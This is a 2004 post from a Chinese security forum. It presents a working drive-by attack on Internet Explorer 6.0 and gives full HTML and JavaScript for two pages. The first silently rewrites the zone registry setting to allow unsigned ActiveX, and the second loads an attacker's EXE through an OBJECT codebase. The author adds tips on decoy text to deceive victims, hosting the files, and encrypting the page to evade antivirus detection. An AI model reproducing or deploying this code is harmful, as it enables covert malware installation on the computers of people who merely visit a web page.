论坛: 原创软件 标题: 让IE6.0执行EXE文件的网页 复制本贴地址    
作者: aosi2003 [aosi2003]    论坛用户   登录
说到要做一个让网页让IE6.0浏览的时候来执行空间下的一个EXE文件的方法要和以前写过的5.0的方法是完全不一样的了,5.0的总体思路是用一个HTML的文件带动一

个有错误开头的EML文件,让IE无条件的执行EML中的附件,可是当我们把IE升级到6.0的时候,再打开这个页面我们会发现WINDOWS会出现一个打开方式的界面,所以我们

前面做的针对IE5.0的是无效的。

下面我们来看看怎么让6.0来执行我们空间的同路径下的一个EXE文件,方法大致是当用户开启第一个HTML的页面时,通过恶意的HTML代码把IE安全级别里的默认的

“禁用下栽未签名的ActiveX控件”选项,变为“启用下栽未签名的ActiveX控件”,然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件,实质就是我们

所要执行的EXE文件,好了,下面我们来说说具体的制作步骤。

【第一步】建立一个1.HTM的文件,内容如下:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<CNTER><HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>

<script language="javascript">
<!-- Begin
function opencolortext(){
window.open('http://xiaomutou.diy.163.com/2.htm','colortext')
}
setTimeout("opencolortext()",1500)
// End -->
</script>
</BODY></HTML>

这里需要说明的是,其中“window.open('http://xiaomutou.diy.163.com/2.htm','colortext')”中的“http://xiaomutou.diy.163.com/2.htm”要改为你自己的

主页空间的路径,其中“setTimeout("opencolortext()",1500)”的“1500”是延时1.5秒中之后打开我们一会将要做的2.HTM文件。好,我们现在就来做这个2.HTM文

件,内容如下:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"3.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1> </H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</SCRIPT>

<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<p align="center">论坛连接中请勿终断....
<BR>
<CENTER></CENTER><BR>
<BR></BODY></HTML>

说明,代码中“run_exe+="CODEBASE=\"3.exe#version=1,1,1,1\">" ”的“3.EXE”就是IE将来要执行的同路径下你的EXE文件

至于论坛连接中请勿终断,完全是迷惑对方的你自己可以变成自己的话。

好了现在将我们做的1.HTM、2.HTM和自己要对方执行的EXE文件一并上传到自己的主页空间下。

现在就让我们用IE6.0来直接浏览这个1.HTM的文件吧,当打开这个页面的1-2秒后应该自动打开另一个空白的页面,紧接着你的EXE文件将被执行,注意所放的EXE文件不要

过大,最好能控制在100K之内.



另外aosi2003提醒大家瑞星会报告可以注册表操作 。。。建议把生成的网页文件加密

呵呵 住大家玩得愉快



地主 发表时间: 04-06-18 08:27

回复: battle [battle]   论坛用户   登录
怎么发这来了

B1层 发表时间: 04-06-25 03:38

论坛: 原创软件

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号